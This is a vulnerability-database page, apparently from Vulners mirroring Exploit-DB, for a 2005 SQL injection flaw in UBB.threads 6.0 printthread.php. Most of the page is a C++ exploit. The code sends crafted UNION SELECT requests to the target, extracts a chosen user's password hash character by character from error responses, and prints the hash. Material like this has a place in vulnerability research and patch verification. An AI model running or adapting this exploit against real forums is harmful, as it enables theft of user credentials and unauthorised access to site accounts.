Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection

🗓️ 11 Mar 2005 00:00:00Reported by HLLType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 69 Views

UBB.threads 6.0 is vulnerable to SQL injection in printthread.php, affecting multiple versions.

Code
// source: https://www.securityfocus.com/bid/13253/info

It is reported that UBB.threads is prone to an SQL injection vulnerability.

The SQL injection vulnerability is reported to affect the 'printthread.php' script.

UBB.threads 6.0 is reported prone to this issue. It is likely that other versions are affected as well. 

//HLLUBBThreadsExploit.cpp
/*
  4. Exploitation

UBB Thread /ubbthreads/printthread.php SQL Injection Yes\No vulnerability

Usage: HLLUBBThreadsExploit.exe <hostname> <path to printthread.php> <Any vaild forum name> <user id>
Example: HLLUBBThreadsExploit.exe www.host.com /ubbthreads/printthread.php UBB3 2
Vulnerability discovered by: Axl
Exploit Coded by HLL: hllhll <at> gmail.com

*/
#include <winsock2.h>
#include <stdio.h>
#include <conio.h>
#include <iostream.h>
#pragma comment (lib,"ws2_32")

void usage(char *argv[])
{
        cout << "[+] UBB Threads Proof-Of-Concept Exploit, Written by: HLL" << endl;
        cout << "[+] Usage:" << endl;
        cout << "[+] " << argv[0] << " <hostname> <path to printthread.php> <Any vaild forum name> <user name> " << endl;
        cout << "[+] " << argv[0] << " www.host.com /ubbthreads/printthread.php UBB3 HLL" << endl;
}


int main(int argc, char *argv[]){


        WSADATA wsaData;
        struct sockaddr_in saddr;
        WSAStartup(MAKEWORD(1, 1), &wsaData);
        struct hostent *h;
        char hash[34]={0};
        int rcvlen;
        char ch;
        int flag, pos;
        int countwait;
        SOCKET sock;
        char req[400];
        char buf[600];
        char rcvbuf[10000];
        char rcvtmpbuf[1024];

        char *host=argv[1]; //Server
        char *path=argv[2]; // Path to /ubbthreads/printthread.php
        char *fname=argv[3]; //Forum name
        int uid=atoi(argv[4]); //User id

        if (argv!=5){
                usage(argv);
                return(0);
        }
        //Resolve address (will work also if this is an IP)
        cout << "[+] Resolving host... ";
        if (!(h=gethostbyname(host)))
        {
                cout << "FAILD!" << endl;
                return(1);
        }
        cout << "Done." << endl;

        saddr.sin_addr=*(struct in_addr *)h->h_addr_list[0];
        memset(saddr.sin_zero, 0, 8);
        saddr.sin_port=htons(80);
        saddr.sin_family=AF_INET;


        cout << "[+] Exploiting target... " << endl;
        for (pos=1; pos<=32; pos++)
        {
                for (ch='0'; ch<='F'; ch++)
                {
                        if ( (sock=socket(AF_INET, SOCK_STREAM, 0)) == -1 )
                        {
                                cout << "FAILD CREATING SOCKET!" << endl;
                                return(1);
                        }


                        if (ch==':') ch='A'; //If finished all digits, jump to hex digits

                        //Prepare reqest
                        sprintf(req,
"%s?Board=%s&type=post&main=-99'%%20UNION%%20SELECT%%20B_Number,B_Posted%%20FROM%%20w3t_Posts,w3t_Users%%20WHERE%%20((MID(U_Password,%d,1)='%c')", path, fname, pos, ch,
pos, ch+32);
                        if (ch>='A' && ch<='Z')
                                sprintf(req, "%sOR%%20(MID(U_Password,%d,1)='%c')", req, pos, ch+32);
                        sprintf(req, "%s)AND(u_number=%d)/*", req, uid);
                        sprintf(buf, "GET %s HTTP/1.0\r\nAccept: * /*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\nHost: %s \r\n\r\n", req,
host);

                        connect(sock, (struct sockaddr *)&saddr, sizeof(struct sockaddr) );
                        send(sock, buf, strlen(buf), 0);
                        cout << "[+] Char: " << ch << endl;

                        //Loop untill disconnection or recognized string
                        flag=0;
                        countwait=0;
                        *rcvbuf=NULL;
                        while(!flag){
                                Sleep(30);

                                if ((rcvlen = recv(sock, rcvtmpbuf, 1023, 0))>0){
                                        rcvtmpbuf[rcvlen]=NULL;
                                        strcat(rcvbuf, rcvtmpbuf);

                                }

                                if ( (++countwait) == 30)
                                        flag=2;
                                if ( strstr(rcvbuf, "SQL Error"))
                                        flag=1;
                        }
                        if (flag==1){ //Char found
                                cout << "[+] Char " << ch << " In pos " << pos << endl;
                                hash[pos-1]=ch;
                                ch='G';
                        }
                        closesocket(sock);
                }

        }


        hash[32]=NULL;
        cout << endl << "The hash for user id" << uid << "is: " << hash << endl;
        WSACleanup();
        return (0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
ubb threadssql injectionprintthread.phpvulnerabilityexploit codeaxlhll
69